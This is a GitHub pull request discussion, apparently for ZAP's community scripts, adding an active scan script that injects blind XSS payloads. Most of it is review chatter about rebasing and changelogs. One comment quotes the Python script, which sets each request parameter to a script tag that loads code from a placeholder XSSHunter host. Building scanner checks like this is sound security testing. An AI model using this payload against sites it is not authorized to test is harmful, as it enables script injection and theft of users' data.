-
-
Notifications
You must be signed in to change notification settings - Fork 253
inject blind xss payloads #214
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Conversation
17f6a21 to
56b2dbf
Compare
|
The changelog should be updated. |
|
@knassar702 are you going to address @thc202’s feedback? |
|
hello @thc202 @kingthorin , im so sorry for this long time I was a bit busy because of studying , i changed it now regards |
|
Okay, I'll rebase and address the conflict tomorrow. |
|
Done |
|
Note: Before you make any further changes/contributions on this PR please ensure you do the following. (That assumes origin is your remote fork.) |
|
If others are good with this I can fix the conflict. |
|
It seems there were too many changes, the |
|
This is what was intended I think: # by: Khaled Nassar @knassar702
# YOUR XSSHUNTER PAYLOAD
bxss = '"><script src="//yourusername.xss.ht"></script>'
def scanNode(sas, msg):
pass
def scan(sas, msg, param, value):
# Copy requests before reusing them
msg = msg.cloneRequest();
# setParam (message, parameterName, newValue)
sas.setParam(msg, param, bxss);
# sendAndReceive(msg, followRedirect, handleAntiCSRFtoken)
sas.sendAndReceive(msg, False, False);From https://raw.githubusercontent.com/zaproxy/community-scripts/17f6a21edf5df582f67c36104b85c683c933216e/active/bxss.py with the comment addressed. |
Add active/bxss.js Signed-off-by: Khaled Nassar <45688522+knassar702@users.noreply.github.com>
|
Should be good now I think |
|
Thank you both! |
No description provided.